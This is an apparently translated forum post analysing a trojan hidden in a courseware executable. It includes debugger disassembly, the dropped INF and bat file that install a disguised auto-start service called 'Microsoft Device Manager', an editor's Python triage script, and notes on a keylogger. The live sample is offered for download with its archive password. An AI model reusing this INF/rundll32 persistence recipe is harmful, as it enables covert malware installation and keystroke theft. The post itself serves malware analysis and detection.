004021A1 |. 83C4 14 add esp,0x14
004021A4 |. 56 push esi ; /hObject
004021A5 |. FF15 10304000 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
004021AB |. 8B45 08 mov eax,[arg.1]
004021AE |. 68 54464000 push Server.00404654 ; My_AddService_Name
004021B3 |. 50 push eax
004021B4 |. 8D8D CCF6FFFF lea ecx,[local.589]
004021BA |. 68 4C464000 push Server.0040464C ; %s,,%s
004021BF |. 51 push ecx
004021C0 |. FF15 54474000 call dword ptr ds:[0x404754] ; user32.wsprintfA
004021C6 |. 8B35 40304000 mov esi,dword ptr ds:[<&KERNEL32.Wr>; kernel32.WritePrivateProfileStringA
004021CC |. 83C4 10 add esp,0x10
004021CF |. 8D95 E4FDFFFF lea edx,[local.135]
004021D5 |. 8D85 CCF6FFFF lea eax,[local.589] ; the following writes the inf file contents
004021DB |. 52 push edx ; /FileName
004021DC |. 50 push eax ; |String
004021DD |. 68 40464000 push Server.00404640 ; |AddService
004021E2 |. 68 28464000 push Server.00404628 ; |DefaultInstall.Services
004021E7 |. FFD6 call esi ; \WritePrivateProfileStringA
004021E9 |. 8B55 0C mov edx,[arg.2]
004021EC |. 8D8D E4FDFFFF lea ecx,[local.135]
004021F2 |. 51 push ecx ; /FileName
004021F3 |. 52 push edx ; |String
004021F4 |. 68 1C464000 push Server.0040461C ; |DisplayName
004021F9 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
004021FE |. FFD6 call esi ; \WritePrivateProfileStringA
00402200 |. 8B4D 10 mov ecx,[arg.3]
00402203 |. 8D85 E4FDFFFF lea eax,[local.135]
00402209 |. 50 push eax ; /FileName
0040220A |. 51 push ecx ; |String
0040220B |. 68 10464000 push Server.00404610 ; |Description
00402210 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
00402215 |. FFD6 call esi ; \WritePrivateProfileStringA
00402217 |. 8D95 E4FDFFFF lea edx,[local.135]
0040221D |. 52 push edx ; /FileName
0040221E |. 68 08464000 push Server.00404608 ; |0x10
00402223 |. 68 FC454000 push Server.004045FC ; |ServiceType
00402228 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
0040222D |. FFD6 call esi ; \WritePrivateProfileStringA
0040222F |. 8D85 E4FDFFFF lea eax,[local.135]
00402235 |. 50 push eax ; /FileName
00402236 |. 68 F8454000 push Server.004045F8 ; |2
0040223B |. 68 EC454000 push Server.004045EC ; |StartType
00402240 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
00402245 |. FFD6 call esi ; \WritePrivateProfileStringA
00402247 |. 8D8D E4FDFFFF lea ecx,[local.135]
0040224D |. 51 push ecx ; /FileName
0040224E |. 68 E8454000 push Server.004045E8 ; |0
00402253 |. 68 D8454000 push Server.004045D8 ; |ErrorControl
00402258 |. 68 54464000 push Server.00404654 ; |My_AddService_Name
0040225D |. FFD6 call esi ; \WritePrivateProfileStringA
0040225F |. 8B45 14 mov eax,[arg.4]
00402262 |. 8D95 E4FDFFFF lea edx,[local.135]
00402268 |. 52 push edx ; /FileName
00402269 |. 8D4D CC lea ecx,[local.13] ; |
0040226C |. 50 push eax ; |String
0040226D |. 51 push ecx ; |Key
0040226E |. 68 54464000 push Server.00404654 ; |My_AddService_Name
00402273 |. C645 CC 53 mov byte ptr ss:[ebp-0x34],0x53 ; |
00402277 |. 885D CD mov byte ptr ss:[ebp-0x33],bl ; |
0040227A |. C645 CE 72 mov byte ptr ss:[ebp-0x32],0x72 ; |
0040227E |. C645 CF 76 mov byte ptr ss:[ebp-0x31],0x76 ; |
00402282 |. C645 D0 69 mov byte ptr ss:[ebp-0x30],0x69 ; |
00402286 |. C645 D1 63 mov byte ptr ss:[ebp-0x2F],0x63 ; |
0040228A |. 885D D2 mov byte ptr ss:[ebp-0x2E],bl ; |
0040228D |. C645 D3 42 mov byte ptr ss:[ebp-0x2D],0x42 ; |
00402291 |. C645 D4 69 mov byte ptr ss:[ebp-0x2C],0x69 ; |
00402295 |. C645 D5 6E mov byte ptr ss:[ebp-0x2B],0x6E ; |
00402299 |. C645 D6 61 mov byte ptr ss:[ebp-0x2A],0x61 ; |
0040229D |. C645 D7 72 mov byte ptr ss:[ebp-0x29],0x72 ; |
004022A1 |. C645 D8 79 mov byte ptr ss:[ebp-0x28],0x79 ; |
004022A5 |. C645 D9 00 mov byte ptr ss:[ebp-0x27],0x0 ; |"My_AddService_Name"
004022A9 |. FFD6 call esi ; \WritePrivateProfileStringA
004022AB |. B1 70 mov cl,0x70 ; all of the above is still writing the inf file contents
004022AD |. B0 20 mov al,0x20
Writing the inf file contents. The inf file from one of my analysis runs is below (the Description value is Chinese and reads "Detects and monitors new hardware devices and automatically updates device drivers."):
[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=X6Remote,,My_AddService_Name
[My_AddService_Name]
DisplayName=Microsoft Device Manager
Description=监测和监视新硬件设备并自动更新设备驱动。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=C:\WINDOWS\system32\qgrzld.exe
00402449 |. C645 89 73 mov byte ptr ss:[ebp-0x77],0x73
0040244D |. C645 8A 00 mov byte ptr ss:[ebp-0x76],0x0
00402451 |. FF15 54474000 call dword ptr ds:[0x404754] ; user32.wsprintfA
00402457 |. 83C4 0C add esp,0xC ; format the bat file contents
0040245A |. 8D95 DCFBFFFF lea edx,[local.265]
00402460 |. 6A 00 push 0x0
00402462 |. 68 80000000 push 0x80
00402467 |. 6A 02 push 0x2
00402469 |. 6A 00 push 0x0
0040246B |. 6A 02 push 0x2
0040246D |. 68 00000040 push 0x40000000
00402472 |. 52 push edx
00402473 |. FF95 48FFFFFF call [local.46] ; (kernel32.CreateFileA) create the bat file
00402479 |. 8BF0 mov esi,eax
0040247B |. 8D45 A0 lea eax,[local.24]
0040247E |. 6A 00 push 0x0
00402480 |. 8D8D D4F8FFFF lea ecx,[local.459]
00402486 |. 50 push eax
00402487 |. 51 push ecx
00402488 |. FFD7 call edi ; (kernel32.lstrlenA)
0040248A |. 40 inc eax
0040248B |. 8D95 D4F8FFFF lea edx,[local.459]
00402491 |. 50 push eax
00402492 |. 52 push edx
00402493 |. 56 push esi
00402494 |. E8 F7ECFFFF call Server.00401190 ; write the bat file contents
00402499 |. 83C4 14 add esp,0x14
0040249C |. 56 push esi ; /hObject
0040249D |. FF15 10304000 call dword ptr ds:[<&KERNEL32.Close>; \CloseHandle
Here is a copy of the bat file that gets written. The bat filename here, like the inf filename above, is hard-coded.
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\WINDOWS\system32\OWy1815552.inf
Obviously the next step is to run the bat, which installs the inf, which in turn starts the exe as a service.
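The INF above is a complete service-installation recipe: `[DefaultInstall.Services]` names the service via `AddService`, the referenced section supplies the binary and start type, and the bat line hands the INF to setupapi's `InstallHinfSection`. The following Python script is an example added by the editor, not code from the original post: it parses an INF of this shape, decodes `ServiceType`/`StartType` into their SCM names, and parses the rundll32 line. The INF and bat text are copied from this post; the flag decoding follows the documented InstallHinfSection mode values (0x80 = use the INF's own directory as the source path, low bits = reboot behaviour, 0 = never reboot) and is the editor's reading of that documentation.

```python
import configparser
import re

# Editor's example, not code from the original post. INF text copied from the post.
SAMPLE_INF = r"""[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=X6Remote,,My_AddService_Name
[My_AddService_Name]
DisplayName=Microsoft Device Manager
Description=监测和监视新硬件设备并自动更新设备驱动。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=C:\WINDOWS\system32\qgrzld.exe
"""
SAMPLE_BAT = r"rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\WINDOWS\system32\OWy1815552.inf"

SERVICE_TYPES = {0x1: "SERVICE_KERNEL_DRIVER", 0x2: "SERVICE_FILE_SYSTEM_DRIVER",
                 0x10: "SERVICE_WIN32_OWN_PROCESS", 0x20: "SERVICE_WIN32_SHARE_PROCESS"}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
               3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}


def triage_inf(text):
    """Follow DefaultInstall.Services -> AddService -> service-install section
    and return the fields an incident responder needs."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str                      # keep key case exactly as written
    cp.read_string(text)
    add = cp.get("DefaultInstall.Services", "AddService")
    # AddService=<ServiceName>,[<flags>],<service-install-section>[,<event-log-section>]
    parts = [p.strip() for p in add.split(",")]
    name, flags, section = parts[0], parts[1] or "0", parts[2]
    svc = cp[section]
    stype = int(svc.get("ServiceType", "0"), 0)   # int(..., 0) accepts 0x10 and 16
    start = int(svc.get("StartType", "0"), 0)
    return {
        "service": name,
        "add_flags": int(flags, 0),
        "display_name": svc.get("DisplayName", ""),
        "binary": svc.get("ServiceBinary", ""),
        "service_type": SERVICE_TYPES.get(stype, hex(stype)),
        "start_type": START_TYPES.get(start, str(start)),
        "autostart": start == 2,             # runs at boot without user action
    }


INSTALL_RE = re.compile(
    r"rundll32(?:\.exe)?\s+setupapi(?:\.dll)?\s*,\s*InstallHinfSection\s+"
    r"(?P<section>\S+)\s+(?P<mode>\d+)\s+(?P<inf>.+)$",
    re.IGNORECASE,
)
REBOOT_MODES = {0: "never reboot", 1: "always reboot", 2: "always prompt",
                3: "reboot if needed", 4: "prompt if needed"}


def parse_install_cmd(line):
    """Decode 'rundll32 setupapi,InstallHinfSection <section> <mode> <inf>'.
    Returns None if the line is not an InstallHinfSection invocation."""
    m = INSTALL_RE.search(line.strip())
    if not m:
        return None
    mode = int(m.group("mode"))
    return {
        "section": m.group("section"),
        "inf": m.group("inf").strip(),
        "inf_dir_as_source": bool(mode & 0x80),
        "reboot": REBOOT_MODES.get(mode & 0x7F, str(mode & 0x7F)),
    }


if __name__ == "__main__":
    print(triage_inf(SAMPLE_INF))
    print(parse_install_cmd(SAMPLE_BAT))
```

Run over the dropped INF this gives the service name to look for under HKLM\SYSTEM\CurrentControlSet\Services, the binary to collect, and the fact that it is an auto-start own-process service, which is what makes the rundll32/setupapi line worth alerting on in command-line telemetry.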
A few more words: once the exe starts, it drops a 21M dll, also named system directory + 6-letter random dll name, e.g. "C:\WINDOWS\system32\mybtke.dll". Both the exe and the dll carry Kingsoft's digital signature. After that, whenever there is keyboard activity it generates a keylog.dat in C:\WINDOWS\system32 to record keystrokes, though the log file is encrypted; I haven't played with the dropped files yet. I don't know who is nasty enough to hide a trojan in courseware; from now on, watch exe tutorials in a sandbox. I'm attaching the sample; play with it carefully. Archive password: 52pojie.
This is also my first time writing an article, and it took a lot of time. I hope everyone will support me and offer suggestions so we can improve together.
--------------------------------------------------------------------------------
【Copyright】: This article is original work by sunflover; when reposting please credit the author and keep the article intact. Thank you!
2013-01-16 03:40:28 AM
Kingsoft FireEye (火眼) analysis result: http://fireeye.ijinshan.com/analyse.html?md5=138060de3bec75d6248b9a664342af5d#full
Server.rar
(66.84 KB, downloads: 31)
My udd file (corrections welcome if you find errors):
Server_udd.rar
(8.72 KB, downloads: 10)